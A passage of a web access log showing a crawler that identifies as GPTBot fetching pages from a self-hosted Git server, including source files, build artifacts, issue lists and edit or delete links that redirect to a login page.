+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13354] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:18:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11144] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:18:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:18:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 10941] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:18:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13921] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" -[17/Feb/2026:18:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481677] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" -[17/Feb/2026:18:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56424] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" -[17/Feb/2026:18:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fwarn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 27645] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:18:08:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:18:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:18:08:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:18:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:18:08:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/main.py" -[17/Feb/2026:18:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/main.py" -[17/Feb/2026:18:08:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/main.py" -[17/Feb/2026:18:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/main.py" -[17/Feb/2026:18:08:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=closed&type=all" -[17/Feb/2026:18:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26364] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26361] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26359] [Gzip 11.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26361] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26363] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26361] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26364] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26363] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 